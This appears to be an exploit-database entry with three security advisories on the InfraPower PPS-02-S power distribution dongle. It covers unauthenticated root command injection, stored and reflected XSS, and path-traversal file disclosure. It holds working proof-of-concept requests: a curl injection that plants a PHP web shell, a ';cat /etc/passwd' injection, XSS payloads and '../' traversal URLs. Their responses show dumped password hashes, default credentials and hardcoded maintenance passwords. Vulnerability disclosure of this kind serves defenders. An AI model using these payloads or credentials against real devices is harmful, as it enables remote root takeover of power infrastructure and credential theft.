/dev/mtdblock1 1.4M 96.0K 1.3M 7% /mnt/mtd
/dev/mtdblock5 1.0M 60.0K 964.0K 6% /mnt/mtd1
/dev/mtdblock6 1.0M 60.0K 964.0K 6% /mnt/mtd2
/dev/mtdblock7 1.0M 60.0K 964.0K 6% /mnt/mtd3
--------
/www # ls -al
drwxr-xr-x 5 1013 1014 0 Jan 13 08:41 .
drwxr-xr-x 16 root root 0 Nov 28 11:17 ..
-rwxr--r-- 1 1013 1014 6875 Apr 22 2014 CSSSource.php
-rwxr--r-- 1 1013 1014 291 Apr 22 2014 Config.php
-rwxr--r-- 1 1013 1014 1685 Apr 22 2014 ConnPort.php
-rwxr--r-- 1 1013 1014 5787 Apr 22 2014 FWUpgrade.php
-rwxr--r-- 1 1013 1014 7105 Apr 22 2014 Firmware.php
-rwxr--r-- 1 1013 1014 10429 Apr 22 2014 Function.php
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 General
-rwxr--r-- 1 1013 1014 1407 Apr 22 2014 Header.php
-rwxr--r-- 1 1013 1014 6775 Apr 22 2014 IPSettings.php
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 Images
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 JavaScript
-rwxr--r-- 1 1013 1014 408 Apr 22 2014 JavaSource.php
-rwxr--r-- 1 1013 1014 849 Apr 22 2014 ListFile.php
-rwxr--r-- 1 1013 1014 12900 Apr 22 2014 Login.php
-rwxr--r-- 1 1013 1014 355 Apr 22 2014 Logout.php
-rwxr--r-- 1 1013 1014 352 Apr 22 2014 Main_Config.php
-rwxr--r-- 1 1013 1014 5419 Apr 22 2014 Menu.php
-rwxr--r-- 1 1013 1014 942 Apr 22 2014 Menu_3.php
-rwxr--r-- 1 1013 1014 4491 Apr 22 2014 Ntp.php
-rwxr--r-- 1 1013 1014 23853 Apr 22 2014 OutletDetails.php
-rwxr--r-- 1 1013 1014 1905 Apr 22 2014 OutletDetails_Ajax.php
-rwxr--r-- 1 1013 1014 48411 Apr 22 2014 PDUDetails.php
-rwxr--r-- 1 1013 1014 4081 Apr 22 2014 PDUDetails_Ajax_Details.php
-rwxr--r-- 1 1013 1014 1397 Apr 22 2014 PDUDetails_Ajax_Outlet.php
-rwxr--r-- 1 1013 1014 19165 Apr 22 2014 PDULog.php
-rwxr--r-- 1 1013 1014 29883 Apr 22 2014 PDUStatus.php
-rwxr--r-- 1 1013 1014 4418 Apr 22 2014 PDUStatus_Ajax.php
-rwxr--r-- 1 1013 1014 7791 Apr 22 2014 PortSettings.php
-rwxr--r-- 1 1013 1014 24696 Apr 22 2014 SNMP.php
-rwxr--r-- 1 1013 1014 38253 Apr 22 2014 SensorDetails.php
-rwxr--r-- 1 1013 1014 27210 Apr 22 2014 SensorStatus.php
-rwxr--r-- 1 1013 1014 5984 Apr 22 2014 SensorStatus_Ajax.php
-rwxr--r-- 1 1013 1014 40944 Apr 22 2014 System.php
-rwxr--r-- 1 1013 1014 4373 Apr 22 2014 UploadEXE.php
-rwxr--r-- 1 1013 1014 9460 Apr 22 2014 User.php
-rwxr--r-- 1 1013 1014 23170 Apr 22 2014 WriteRequest.php
-rwxr--r-- 1 1013 1014 8850 Apr 22 2014 WriteRequest_Ajax.php
-rwxr--r-- 1 1013 1014 10811 Apr 22 2014 dball.php
-rwxr--r-- 1 1013 1014 771 Apr 22 2014 doupgrate.php
-rwxr--r-- 1 1013 1014 76 Apr 22 2014 index.php
-rwxr--r-- 1 1013 1014 49 Apr 22 2014 nfs.sh
-rwxr--r-- 1 1013 1014 5410 Apr 22 2014 production_test1.php
-rwxr--r-- 1 1013 1014 723 Apr 22 2014 vaildate.php
-rwxr--r-- 1 1013 1014 611 Apr 22 2014 wiseup.php

View file

@ -0,0 +1,348 @@
InfraPower PPS-02-S Q213V1 Unauthenticated Remote Root Command Execution
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: InfraPower suffers from multiple unauthenticated remote command
injection vulnerabilities. The vulnerability exist due to several POST
parameters in several scripts not being sanitized when using the exec(),
proc_open(), popen() and shell_exec() PHP function while updating the
settings on the affected device. This allows the attacker to execute
arbitrary system commands as the root user and bypass access controls in
place.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5372
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5372.php
27.09.2016
--
doupgrate.php:
--------------
09: <?
10: echo "Firmware Upgrate Using NFS:<BR>";
11: echo "IP=".$_POST["ipaddr"]."<BR>";
12: echo "Firmware Name=".$_POST["fwname"]."<BR>";
13: system("sh nfs.sh");
14: echo "Mounting NFS<BR>";
15: system("mount -t nfs -o nolock ".$_POST["ipaddr"].":".$_POST["nfsdir"]." /nfs");
16: system("cp /nfs/".$_POST["fwname"]." /");
17: echo "Flash erasing<BR>";
18: system("@flash_eraseall /dev/mtd0");
19: system("cp /".$_POST["fwname"]." /dev/mtd0");
20: echo "Upgrate done<BR>";
21: system("umount /nfs");
22: echo "Reboot system<BR>";
23: system("reboot");
24: ?>
---------------------------------------------------------------------
IPSettings.php:
---------------
83: $IP_setting = ereg_ip($_POST['IP']);
84: $Netmask_setting = ereg_ip($_POST['Netmask']);
85: $Gateway_setting = ereg_ip($_POST['Gateway']);
...
...
110: $fout = fopen("/mnt/mtd/net_conf", "w");
111: if($fout){
112: $output = substr($output, 0, -1);
113: fprintf($fout, "%s", $output);
114: //echo $change_ip.'b';
115: if($change_ip === '1'){
116: $str = '';
117: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str);
118: // echo $str."\n";
119: }
120: if($change_gw === '1'){
121: $str = '';
122: exec('ip route del default', $str);
123: exec('route add default gw '.$Gateway_setting, $str);
124: // echo $str[0]."a\n";
125: }
126: }
127: fclose($fout);
...
...
164: function ereg_ip($ipstring){
165: $ipstring=trim($ipstring); //移除前後空白
166: //格式錯誤
167: if(!ereg("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$ipstring))return 0;
168: //內容檢查
169: $ip_segment =split("\.",$ipstring); //注意一定要加 "\",否則會分不開。
170: foreach($ip_segment as $k =>$v){
171: if($v >255){
171: return 0;
172: }
173: $ip_segment[$k]=(int)$ip_segment[$k]; //消除ip中的0ex:1.020.003.004 =>1.20.3.4
174: } //end foreach
175: $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //將字串$ip處理
176: return $ipstring;
177: }
---------------------------------------------------------------------
Login.php:
----------
126: $UserName = getConf("/mnt/mtd/web_conf", "UserName");
127: $Password = getConf("/mnt/mtd/web_conf", "Password");
128:
129: //echo 'z'.$_POST['ID_User'].';'.$UserName.' Pwd:'.$_POST['ID_Password'].';'.$Password;
130: if($_POST['ID_User'] === $UserName && $_POST['ID_Password'] === $Password){
...
...
140: $_SESSION['Login'] = $_POST['ID_User'];
141:
142: //Login
143: $loginTime = date("Y-m-d,H:i:s.0,P");
144: $remoteIP = $_SERVER['REMOTE_ADDR'];
145: //----------SNMP checking ---Ed 20130307------------------------<
146: $SNMPEnable = getConf("/mnt/mtd/snmp_conf", "enable");
147: if ($SNMPEnable == "1") {
148: $TrapEnable = getConf("/mnt/mtd/snmp_conf", "trap");
149: if ($TrapEnable == "v2Trap") {
150: $trapTo = getConf("/mnt/mtd/snmp_conf", "IP");
151: shell_exec('/usr/bin/snmptrap -M /usr/share/snmp/mibs/ -c public -v 2c ' . $trapTo . ' \'\' InfraPower-MIB::webLogin InfraPower-MIB::objectDateTime s "' . $loginTime . '" InfraPower-MIB::userName s "' . $_POST['ID_User'] . '" InfraPower-MIB::webAccessIpAddress s "' . $remoteIP . '"');
152: //echo "alert($res);";
153: }
154: }
---------------------------------------------------------------------
Ntp.php:
--------
36: <?php
37: if(empty($_POST['Change']))
38: $tzone='8';
39: else
40: {
41:
42: $tzone=$_POST['ID_timezone'];
43: $idx=$tzone+12;
44: echo "update status...";
45: exec("/usr/bin/ntpclient -s -h 220.130.158.71");
46: exec("/usr/bin/zonegen ".$idx);
47: exec("/usr/bin/zic -d /usr/bin/ zonetime");
48: exec("mv /usr/bin/localtime /etc/localtime");
49: echo "OK";
50: }
51: ?>
---------------------------------------------------------------------
production_test1.php:
---------------------
4: if( isset($_POST['macAddress']) )
5: {
6: shell_exec("echo ". $_POST['macAddress'] . " > /mnt/mtd/mac_addr");
7: $mac = shell_exec("cat /mnt/mtd/mac_addr");
8: /*$result = $fail;
9: echo $mac . ",";
10: echo $_POST['macAddress'];
11: if( !strcmp($mac,$_POST['macAddress']) )
12: $result = $success;
13: echo "verify - " . $mac . " - " . $result;*/
14: echo "verify - " . $mac;
15:
16: exit();
17: }
---------------------------------------------------------------------
SNMP.php:
---------
34: if($_POST["SNMPAgent"] === "Enable"){
35: exec('kill -9 `ps | grep "snmpd -c /mnt/mtd/snmpd.conf" | cut -c 1-5`');
36: setConf("/mnt/mtd/snmp_conf", "enable", "1");
37:
38: if(!empty($_POST["CommuintyString"]) && !empty($_POST["CommuintyWrite"]))
39: {
40: exec("cp /etc/snmpd.conf /mnt/mtd/snmpd.conf");
41: exec("sed -i s/public/".$_POST["CommuintyString"]."/g /mnt/mtd/snmpd.conf");
42: setConf("/mnt/mtd/snmp_conf", "pCommunity", $_POST["CommuintyString"]);
43: setSnmpConf(1,$_POST["CommuintyString"]);
44: setSnmpConf(2,$_POST["CommuintyWrite"]);
45: $pCommunity = $_POST["CommuintyString"];
46: }
---------------------------------------------------------------------
System.php:
-----------
86: if(!empty($_POST['ChangeTime']) == "1"){
87: if(checkdate($_POST['month'], $_POST['day'], $_POST['year']) == 1){
88:
89: //Ray modify
90: $datetime = date("mdHiY.s", mktime($_POST['hour']-1,$_POST['minute']-1,$_POST['second']-1,$_POST['month'],$_POST['day'],$_POST['year']));
91: //$datetime = $_POST['month'].$_POST['day'].$_POST['hour'].$_POST['minute'].$_POST['year'].'.'.$_POST['second'];
92:
93:
94: if(isset($_POST['TimeZone'])){
95: setTimeZone($_POST['TimeZone']);
96: $orgZone = $_POST['TimeZone'];
97: }
98:
99: exec('date '.$datetime);
100: exec('hwclock -w');
101: exec('hwclock -w -f /dev/rtc1');
...
...
180: if(isset($_POST['TimeServer'])){
181: //$TimeServer = ereg_ip($_POST['TimeServer']);
182: if(!empty($_POST['TimeServer'])){
183: $TimeServer = $_POST['TimeServer'];
184:
185: $returnStr = exec("/usr/bin/ntpclient -s -h ".$TimeServer . " -i 1");
...
...
286: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str);
...
...
292: exec('route add default gw '.$Gateway_setting, $str);
...
...
336: function ereg_ip($ipstring){
337: $ipstring=trim($ipstring); //移除前後空白
338: //格式錯誤
339: if(!ereg("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$ipstring))return 0;
340: //內容檢查
341: $ip_segment =split("\.",$ipstring); //注意一定要加 "\",否則會分不開。
342: foreach($ip_segment as $k =>$v){
343: if($v >255){
344: return 0;
345: }
346: $ip_segment[$k]=(int)$ip_segment[$k]; //消除ip中的0ex:1.020.003.004 =>1.20.3.4
347: } //end foreach
348: $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //將字串$ip處理
349: return $ipstring;
350: }
---------------------------------------------------------------------
UploadEXE.php:
--------------
72: if(isset($_POST['hasFile'])){
73: if ($_FILES['ExeFile']['error'] > 0){
74: echo 'Error: ' . $_FILES['FW']['error'];
75: }else{
76: echo 'File Name: ' . $_FILES['ExeFile']['name'].'<br/>';
...
...
80: move_uploaded_file($_FILES['ExeFile']['tmp_name'], '/ramdisk/'.$_FILES['ExeFile']['name']);
81: chmod("/ramdisk/".$_FILES['ExeFile']['name'], "0777");
82: $fp = popen("\"/ramdisk/".$_FILES['ExeFile']['name']."\"", "r");
---------------------------------------------------------------------
---------------------------------------------------------------------
---------------------------------------------------------------------
#1
--
PoC Request:
curl -i -s -k -X 'POST' \
-H 'User-Agent: ZSL-Injectinator/3.1 (Unix)' -H 'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'SNMPAgent=Enable&CommuintyString=public|%65%63%68%6f%20%22%3c%3f%70%68%70%20%65%63%68%6f%20%73%79%73%74%65%6d%28%5c%24%5f%47%45%54%5b%27%63%27%5d%29%3b%20%3f%3e%22%20%3Etest251.php%26&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254' \
'https://192.168.0.17/SNMP.php?Menu=SMP'
...
curl -k https://192.168.0.17/test251.php?c=whoami;echo " at ";uname -a
Response:
root
at
Linux A320D 2.6.28 #866 PREEMPT Tue Apr 22 16:07:03 HKT 2014 armv5tel unknown
#2
--
PoC Request:
POST /production_test1.php HTTP/1.1
Host: 192.168.0.17
User-Agent: ZSL-Injectinator/3.1 (Unix)
Content-Type: application/x-www-form-urlencoded
Connection: close
macAddress=ZE:RO:SC:IE:NC:E0;cat /etc/passwd
Response:
HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.9
Content-type: text/html
Connection: close
Date: Fri, 17 Jan 2003 16:58:52 GMT
Server: lighttpd/1.4.30-devel-1321
Content-Length: 751
verify - root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh

235
platforms/php/webapps/40641.txt Executable file
View file

@ -0,0 +1,235 @@
InfraPower PPS-02-S Q213V1 Multiple XSS Vulnerabilities
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: InfraPower suffers from multiple stored and reflected XSS vulnerabilities
when input passed via several parameters to several scripts is not properly
sanitized before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of an affected
site.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5369
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5369.php
27.09.2016
--
#################################################################################
GET /SensorDetails.php?Menu=SST&DeviceID=C100"><script>alert(1)</script> HTTP/1.1
#################################################################################
POST /FWUpgrade.php HTTP/1.1
Host: 192.168.0.17
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary207OhXVwesC60pdh
Connection: close
------WebKitFormBoundary207OhXVwesC60pdh
Content-Disposition: form-data; name="FW"; filename="somefile.php<img src=x onerror=confirm(2)>"
Content-Type: text/php
t00t
------WebKitFormBoundary207OhXVwesC60pdh
Content-Disposition: form-data; name="upfile"
somefile.php
------WebKitFormBoundary207OhXVwesC60pdh
Content-Disposition: form-data; name="ID_Page"
Firmware.php?Menu=FRM
------WebKitFormBoundary207OhXVwesC60pdh--
#################################################################################
POST /SNMP.php?Menu=SMP HTTP/1.1
Host: 192.168.0.17
SNMPAgent=Enable&CommuintyString=public&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254';alert(3)//
#################################################################################
lqwrm@zslab:~#
lqwrm@zslab:~# ./scanmyphp -v -r -d infrapower -o scan_output.txt
-------------------------------------------------
PHP Source Code Security Scanner v0.2
(c) Zero Science Lab - http://www.zeroscience.mk
Tue Sep 27 10:35:52 CEST 2016
-------------------------------------------------
Scanning recursively...Done.
dball.php:
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$Table'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
doupgrate.php:
Line 11: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
Line 12: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
Line 15: Command Injection in 'system' via '$_POST'
Line 16: Command Injection in 'system' via '$_POST'
Line 19: Command Injection in 'system' via '$_POST'
Firmware.php:
Line 166: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
Function.php:
Line 257: Header Injection in 'header' via '$_SERVER'
Line 267: Header Injection in 'header' via '$_SERVER'
FWUpgrade.php:
Line 39: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 43: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 44: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
index.php:
Line 2: Header Injection in 'header' via '$_SERVER'
IPSettings.php:
Warning: ereg() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged.
Warning: split() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged.
Line 117: Command Injection in 'exec' via '$IP_setting'
Line 117: Command Injection in 'exec' via '$Netmask_setting'
Line 123: Command Injection in 'exec' via '$Gateway_setting'
ListFile.php:
Line 12: PHP File Inclusion in 'fgets' via '$fp'
Login.php:
Line 151: Command Injection in 'shell_exec' via '$_POST'
Ntp.php:
Line 46: Command Injection in 'exec' via '$idx'
OutletDetails.php:
Line 78: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 241: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 623: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 674: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 730: Cross-Site Scripting (XSS) in 'echo' via '$row'
Line 732: Cross-Site Scripting (XSS) in 'echo' via '$row'
Line 914: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
PDUStatus.php:
Line 625: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
production_test1.php:
Line 6: Command Injection in 'shell_exec' via '$_POST'
Line 45: Command Injection in 'proc_open' via '$_ENV'
SensorDetails.php:
Line 844: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 896: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 1233: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
SensorStatus.php:
Line 695: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
SNMP.php:
Line 41: Command Injection in 'exec' via '$_POST'
System.php:
Line 54: Header Injection in 'header' via '$_SERVER'
Line 64: Header Injection in 'header' via '$_SERVER'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 185: Command Injection in 'exec' via '$TimeServer'
Line 286: Command Injection in 'exec' via '$IP_setting'
Line 286: Command Injection in 'exec' via '$Netmask_setting'
Line 292: Command Injection in 'exec' via '$Gateway_setting'
UploadEXE.php:
Line 74: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 76: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 82: Command Injection in 'popen' via '$_FILES'
Line 96: PHP File Inclusion in 'fgets' via '$fp'
Line 96: PHP File Inclusion in 'fgets' via '$buffer'
WriteRequest.php:
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page'
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page'
-----------------------------------------------------
Scan finished. Check results in scan_output.txt file.
lqwrm@zslab:~#

389
platforms/php/webapps/40642.txt Executable file
View file

@ -0,0 +1,389 @@
InfraPower PPS-02-S Q213V1 Local File Disclosure Vulnerability
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: InfraPower suffers from a file disclosure vulnerability when
input passed thru the 'file' parameter to 'ListFile.php' script is
not properly verified before being used to read files. This can
be exploited to disclose contents of files from local resources.
-------------------------------------------------------------------
ListFile.php:
-------------
8: if(isset($_GET['file'])){
9: $handle = $_GET['file'];
10: $fp = fopen('/ramdisk/'.$handle, 'r');
11: while(!feof($fp)){
12: $tmp=fgets($fp,2000);
13: $tmp = str_replace("\n","<br />",$tmp);
14: echo $tmp;
15: }
16: fclose($fp);
17: }
-------------------------------------------------------------------
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5370
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5370.php
27.09.2016
--
http://192.168.0.17/ListFile.php?file=../../../../../../../etc/passwd
root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
http://192.168.0.17/ListFile.php?file=../../../../../../../etc/web_conf
LoginAuth 1
UserName 00000000
Password 00000000
http://192.168.0.17/ListFile.php?file=../../../../../../../mnt/mtd/password_conf
dmin 999999
manager 666666
user 111111
http://192.168.0.17/ListFile.php?file=../../../../../../../sbin/maintenance_shell.sh
#!/bin/sh
echo -n "Please enter maintenance password:"
read -s pass
InfraType=`cat /mnt/mtd/main_conf | grep "InfraType" | cut -d " " -f 2`
if [ "$InfraType" == "1" ]; then
if [ "$pass" != "InfraSolution" ]; then
echo "Invalid maintenance password!"
exit 0
fi
else
if [ "$InfraType" == "2" ]; then
if [ "$pass" != "InfraGuard" ]; then
echo "Invalid maintenance password!"
exit 0
fi
else
if [ "$InfraType" == "3" ]; then
if [ "$pass" != "InfraPower" ]; then
echo "Invalid maintenance password!"
exit 0
fi
else
if [ "$InfraType" == "4" ]; then
if [ "$pass" != "InfraCool" ]; then
echo "Invalid maintenance password!"
exit 0
fi
else
#---emergency recovery mode
echo "DEBUG su mode started!"
su
fi
fi
fi
fi
# create menu
echo ""
echo "***********************************************"
echo "* Maintenance Menu *"
echo "***********************************************"
echo "(1) View(vi) /mnt/mtd/main_conf "
echo "(2) View /mnt/mtd/snmp_conf "
echo "(3) View /mnt/mtd/net_conf "
echo "(4) View /mnt/mtd/web_conf "
echo "(5) Enable auto patching(boot.sh) on bootup "
echo "(6) Disable auto patching(boot.sh) on bootup "
echo "(7) Clear all patching (/mnt/mtd/patch/) "
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
echo "(9) Process Monitoring "
echo "(A) Patch SNMP "
echo "(B) Restore Configuration "
echo "(P) Restore INI, POL profiles "
echo "(E) Execute command line "
echo "(M) View meminfo "
echo "(X) Terminal console mode "
echo "(R) Reboot "
echo "(?) This menu "
echo "(Q) Exit "
echo "***********************************************"
while true; do
echo -n "Input Maintenance menu item number(? for help):"
read y
case $y in
"?")
echo ""
echo "***********************************************"
echo "* Maintenance Menu *"
echo "***********************************************"
echo "(1) View(vi) /mnt/mtd/main_conf "
echo "(2) View /mnt/mtd/snmp_conf "
echo "(3) View /mnt/mtd/net_conf "
echo "(4) View /mnt/mtd/web_conf "
echo "(5) Enable auto patching(boot.sh) on bootup "
echo "(6) Disable auto patching(boot.sh) on bootup "
echo "(7) Clear all patching (/mnt/mtd/patch/) "
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
echo "(9) Process Monitoring "
echo "(A) Patch SNMP "
echo "(B) Restore Configuration "
echo "(P) Restore INI, POL profiles "
echo "(E) Execute command line "
echo "(M) View meminfo "
echo "(X) Terminal console mode "
echo "(R) Reboot "
echo "(?) This menu "
echo "(Q) Exit "
echo "***********************************************"
;;
"1")
echo "****/mnt/mtd/main_conf******************************"
vi /mnt/mtd/main_conf
echo "****************************************************"
;;
"2")
echo "****/mnt/mtd/snmp_conf******************************"
cat /mnt/mtd/snmp_conf
echo "****************************************************"
;;
"3")
echo "****/mnt/mtd/net_conf*******************************"
cat /mnt/mtd/net_conf
echo "****************************************************"
;;
"4")
echo "****/mnt/mtd/web_conf*******************************"
cat /mnt/mtd/web_conf
echo "****************************************************"
;;
"5")
echo "(5) Enable auto patching(boot.sh) on bootup "
echo -n "Are you sure to continue? [y/n]:"
read ans5
if [ "$ans5" == "y" ]; then
if [ -f "/mnt/mtd/patch/mnt/mtd/boot.sh" ]; then
echo -n "Patching boot.sh ..."
cp /mnt/mtd/patch/mnt/mtd/boot.sh /mnt/mtd/boot.sh
chmod 777 /mnt/mtd/boot.sh
if [ -f "/mnt/mtd/boot.sh" ]; then
echo "...done"
else
echo "...fail"
fi
else
echo "file not exist: /mnt/mtd/patch/boot.sh"
fi
fi
;;
"6")
echo "(6) Disable auto patching(boot.sh) on bootup "
echo -n "Are you sure to continue? [y/n]:"
read ans6
if [ "$ans6" == "y" ]; then
if [ -f "/mnt/mtd/boot.sh" ]; then
echo -n "Disabling boot.sh pacthing..."
rm /mnt/mtd/boot.sh
echo "...done"
else
echo "File not exist: /mnt/mtd/boot.sh"
fi
fi
;;
"7")
echo "(7) Clear /mnt/mtd/patch/ "
echo -n "Are you sure to continue? [y/n]:"
read ans7
if [ "$ans7" == "y" ]; then
echo -n " Removing patch files (/mnt/mtd/patch/*)..."
rm -r /mnt/mtd/patch/*
if [ ! -f "/mnt/mtd/patch/" ]; then
echo "...done"
echo -n "Reboot to apply changes? [y/n]:"
read ans7r
if [ "$ans7r" == "y" ]; then
echo "Rebooting..."
reboot
fi
else
echo "...fail"
fi
fi
;;
"8")
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
echo -n "Are you sure to continue? [y/n]:"
read ans8
if [ "$ans8" == "y" ]; then
if [ -f "/www/patch/patch_now.sh" ]; then
chmod 777 /www/patch/patch_now.sh
sh /www/patch/patch_now.sh
else
echo "file not exist: /www/patch/patch_now.sh"
fi
fi
;;
"9")
echo "****Process List*******************************"
ps
echo "***********************************************"
;;
"A")
echo "(A) Patch SNMP "
echo -n "Are you sure to continue? [y/n]:"
read ans8
if [ "$ans8" == "y" ]; then
if [ -f "/www/patch/snmplink.sh" ]; then
sh /www/patch/snmplink.sh
if [ -f "/www/snmplink.log" ]; then
cat /www/snmplink.log
fi
